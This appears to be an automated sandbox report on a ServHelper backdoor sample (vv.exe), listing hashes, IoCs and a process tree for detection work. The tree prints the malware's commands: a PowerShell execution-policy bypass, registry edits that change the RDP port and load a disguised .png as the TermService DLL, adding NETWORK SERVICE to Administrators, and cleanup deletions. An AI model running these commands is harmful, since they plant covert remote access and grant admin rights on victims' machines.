Analysis
- max time kernel: 76s
- max time network: 136s
- platform: windows10_x64
- resource: win10-en
- submitted: 10-09-2021 23:52
Static task: static1
Behavioral task: behavioral1 (Sample: vv.exe, Resource: win7v20210408)
Behavioral task: behavioral2 (Sample: vv.exe, Resource: win10-en)
General
- Target: vv.exe
- Size: 4.0MB
- MD5: 9cadcadb612787dc6c2e9901ffe49dec
- SHA1: dfaeffadd7767ea23cabc31a59ae2cd461abf00f
- SHA256: 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb
- SHA512: e7d908a73e85965359169b9d3e14ec3f1f81218354aa09a8d6c027be230e30c4f334122b933579ce6ad35e5eaffc01c6d8124e5f1a11671b7f6b36549d55beff
Malware Config
Signatures
- ServHelper: ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP): uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- Drops file in System32 directory (1 IoC)
  File created: C:\Windows\SysWOW64\rdpclip.exe (powershell.exe)
- Drops file in Windows directory (8 IoCs)
  File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid 4680 powershell.exe (recorded 6 times)
  pid 5036 powershell.exe (recorded 3 times)
  pid 972 powershell.exe (recorded 3 times)
  pid 688 powershell.exe (recorded 3 times)
- Suspicious behavior: LoadsDriver (1 IoC)
  pid 656
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, pid 4680 powershell.exe
  Token: SeDebugPrivilege, pid 5036 powershell.exe
  Token: SeDebugPrivilege, pid 972 powershell.exe
  Token: SeDebugPrivilege, pid 688 powershell.exe
- Suspicious use of WriteProcessMemory (63 IoCs; each of the 21 parent/target pairs below was recorded 3 times)
  PID 4564 vv.exe wrote to memory of PID 4680 powershell.exe
  PID 4680 powershell.exe wrote to memory of PID 4876 csc.exe
  PID 4876 csc.exe wrote to memory of PID 4904 cvtres.exe
  PID 4680 powershell.exe wrote to memory of PID 5036 powershell.exe
  PID 4680 powershell.exe wrote to memory of PID 972 powershell.exe
  PID 4680 powershell.exe wrote to memory of PID 688 powershell.exe
  PID 4680 powershell.exe wrote to memory of PID 4536 reg.exe
  PID 4680 powershell.exe wrote to memory of PID 2732 reg.exe
  PID 4680 powershell.exe wrote to memory of PID 4100 reg.exe
  PID 4680 powershell.exe wrote to memory of PID 2392 net.exe
  PID 2392 net.exe wrote to memory of PID 2396 net1.exe
  PID 4680 powershell.exe wrote to memory of PID 2712 cmd.exe
  PID 2712 cmd.exe wrote to memory of PID 2176 cmd.exe
  PID 2176 cmd.exe wrote to memory of PID 880 net.exe
  PID 880 net.exe wrote to memory of PID 4732 net1.exe
  PID 4680 powershell.exe wrote to memory of PID 424 cmd.exe
  PID 424 cmd.exe wrote to memory of PID 1040 cmd.exe
  PID 1040 cmd.exe wrote to memory of PID 1180 net.exe
  PID 1180 net.exe wrote to memory of PID 1268 net1.exe
  PID 4680 powershell.exe wrote to memory of PID 3920 cmd.exe
  PID 4680 powershell.exe wrote to memory of PID 3948 cmd.exe
Processes (indentation shows the parent/child relationship; depth is the level in the process tree)
- C:\Users\Admin\AppData\Local\Temp\vv.exe (PID 4564, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\vv.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4680, depth 2)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 4876, depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kgvouvyj\kgvouvyj.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 4904, depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CF1.tmp" "c:\Users\Admin\AppData\Local\Temp\kgvouvyj\CSCD7C6624F86EE4BDA8EBC4BF80405E2C.TMP"
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5036, depth 3)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 972, depth 3)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 688, depth 3)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\reg.exe (PID 4536, depth 3)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\SysWOW64\reg.exe (PID 2732, depth 3)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    - C:\Windows\SysWOW64\reg.exe (PID 4100, depth 3)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\SysWOW64\net.exe (PID 2392, depth 3)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2396, depth 4)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\SysWOW64\cmd.exe (PID 2712, depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 2176, depth 4)
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (PID 880, depth 5)
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\net1.exe (PID 4732, depth 6)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\SysWOW64\cmd.exe (PID 424, depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 1040, depth 4)
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (PID 1180, depth 5)
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\net1.exe (PID 1268, depth 6)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\SysWOW64\cmd.exe (PID 3920, depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\SysWOW64\cmd.exe (PID 3948, depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
MITRE ATT&CK Enterprise v6
Downloads